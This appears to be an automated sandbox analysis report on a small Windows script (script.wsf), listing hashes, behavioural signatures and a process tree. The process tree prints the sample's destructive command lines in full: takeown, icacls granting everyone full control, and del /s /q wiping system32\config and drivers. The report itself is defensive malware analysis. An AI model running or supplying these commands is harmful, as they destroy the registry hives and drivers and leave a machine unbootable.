Analysis
  max time kernel: 11s
  max time network: 16s
  platform: windows7_x64
  resource: win7-20240704-en
  resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  submitted: 15-08-2024 21:44
  Static task: static1
  Behavioral task: behavioral1
  Sample: script.wsf
  Resource: win7-20240704-en
General
  Target: script.wsf
  Size: 3KB
  MD5: 0355b976d816c3dafeda740c75450a08
  SHA1: 98de5b1ee4c653658966effecf248bf7a8df7cd1
  SHA256: 7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
  SHA512: 2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779
Malware Config
Signatures
Possible privilege escalation attempt (4 IoCs)
  Processes:
    pid   process
    2596  takeown.exe
    2068  takeown.exe
    3064  icacls.exe
    1464  icacls.exe

Modifies file permissions (1 TTPs, 4 IoCs)
  Processes:
    pid   process
    2596  takeown.exe
    2068  takeown.exe
    3064  icacls.exe
    1464  icacls.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
    description                      pid   process
    Token: SeTakeOwnershipPrivilege  2068  takeown.exe

Suspicious use of WriteProcessMemory (21 IoCs)
  Processes:
    description                        pid   process      target process
    PID 2576 wrote to memory of 2756   2576  cmd.exe      WScript.exe
    PID 2576 wrote to memory of 2756   2576  cmd.exe      WScript.exe
    PID 2576 wrote to memory of 2756   2576  cmd.exe      WScript.exe
    PID 2756 wrote to memory of 2760   2756  WScript.exe  cmd.exe
    PID 2756 wrote to memory of 2760   2756  WScript.exe  cmd.exe
    PID 2756 wrote to memory of 2760   2756  WScript.exe  cmd.exe
    PID 2756 wrote to memory of 2636   2756  WScript.exe  cmd.exe
    PID 2756 wrote to memory of 2636   2756  WScript.exe  cmd.exe
    PID 2756 wrote to memory of 2636   2756  WScript.exe  cmd.exe
    PID 2760 wrote to memory of 2596   2760  cmd.exe      takeown.exe
    PID 2760 wrote to memory of 2596   2760  cmd.exe      takeown.exe
    PID 2760 wrote to memory of 2596   2760  cmd.exe      takeown.exe
    PID 2760 wrote to memory of 3064   2760  cmd.exe      icacls.exe
    PID 2760 wrote to memory of 3064   2760  cmd.exe      icacls.exe
    PID 2760 wrote to memory of 3064   2760  cmd.exe      icacls.exe
    PID 2636 wrote to memory of 2068   2636  cmd.exe      takeown.exe
    PID 2636 wrote to memory of 2068   2636  cmd.exe      takeown.exe
    PID 2636 wrote to memory of 2068   2636  cmd.exe      takeown.exe
    PID 2636 wrote to memory of 1464   2636  cmd.exe      icacls.exe
    PID 2636 wrote to memory of 1464   2636  cmd.exe      icacls.exe
    PID 2636 wrote to memory of 1464   2636  cmd.exe      icacls.exe
Processes
(process tree; depth shown in brackets, children indented under their parent)

  [1] C:\Windows\system32\cmd.exe
      Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\script.wsf C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
      PID: 2576
      - Suspicious use of WriteProcessMemory

    [2] C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.wsf.vbs"
        PID: 2756
        - Suspicious use of WriteProcessMemory

      [3] C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
          PID: 2760
          - Suspicious use of WriteProcessMemory

        [4] C:\Windows\system32\takeown.exe
            Command line: takeown /f c:\windows\system32\config\*
            PID: 2596
            - Possible privilege escalation attempt
            - Modifies file permissions

        [4] C:\Windows\system32\icacls.exe
            Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
            PID: 3064
            - Possible privilege escalation attempt
            - Modifies file permissions

      [3] C:\Windows\System32\cmd.exe
          Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
          PID: 2636
          - Suspicious use of WriteProcessMemory

        [4] C:\Windows\system32\takeown.exe
            Command line: takeown /f c:\windows\system32\drivers\*
            PID: 2068
            - Possible privilege escalation attempt
            - Modifies file permissions
            - Suspicious use of AdjustPrivilegeToken

        [4] C:\Windows\system32\icacls.exe
            Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
            PID: 1464
            - Possible privilege escalation attempt
            - Modifies file permissions
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize: 3KB
  MD5: 0355b976d816c3dafeda740c75450a08
  SHA1: 98de5b1ee4c653658966effecf248bf7a8df7cd1
  SHA256: 7786be7dadf8cf4d51607d72cdd3a7f047668c91edfbf5c0623798688d712ab7
  SHA512: 2aa4dd903915d0f7394ebb8b802ad81d2aeda3561d94dc679b693a7e5b32a2f1bf79f0ddffb8971bd61f95b5a68d8bfbb8a5fa361f8580620ad7ab8985210779

  Filesize: 79B
  MD5: edc6cfebfd829729d9fc80aaaf02d193
  SHA1: 6d04bf8c7b542301f7eb77eeceed16969053537c
  SHA256: d0391b24b4bb809ba05a9b9e3fbee72a8b39381b16567de0ca7d9f403211cb47
  SHA512: 8afab19929d1bc3fe4d878ee7dd0b711834e53564afdf8e7d0a7186d1f01b35f5f4aeba4d3c5c964e2fbda08203611dc8bd140b717d3e579dc4b3f1684e3908c

  Filesize: 2B
  MD5: 81051bcc2cf1bedf378224b0a93e2877
  SHA1: ba8ab5a0280b953aa97435ff8946cbcbb2755a27
  SHA256: 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
  SHA512: 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d